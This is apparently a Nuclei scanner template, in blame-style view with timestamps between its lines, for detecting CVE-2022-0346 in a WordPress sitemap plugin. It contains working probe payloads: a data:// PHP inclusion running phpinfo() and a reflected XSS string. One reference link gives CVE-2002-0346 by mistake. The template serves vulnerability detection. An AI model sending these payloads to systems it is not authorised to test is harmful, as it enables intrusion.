2022-05-19 17:59:08 +00:00
id : CVE-2022-0346
info :
name : Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
author : Akincibor
2022-05-30 09:21:28 +00:00
severity : medium
2022-05-19 18:07:56 +00:00
description : |
The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
2022-05-19 17:59:08 +00:00
reference :
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
2022-05-19 18:07:56 +00:00
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0346
2022-05-30 09:21:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-0346
cwe-id : CWE-79
2022-05-19 18:07:56 +00:00
metadata :
2022-05-30 09:21:28 +00:00
verified : "true"
2022-05-19 17:59:08 +00:00
tags : xss,wp,wordpress,wp-plugin,cve,cve2022
requests :
- method : GET
path :
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-05-19 18:07:56 +00:00
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-05-19 17:59:08 +00:00
2022-05-19 18:07:56 +00:00
req-condition : true
2022-05-19 17:59:08 +00:00
matchers-condition : and
matchers :
2022-05-19 18:07:56 +00:00
- type : dsl
dsl :
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
2022-05-19 17:59:08 +00:00
condition : or
- type : word
part : header
words :
- text/html
extractors :
- type : regex
part : body
group : 1
regex :
- '>PHP Version <\/td><td class="v">([0-9.]+)'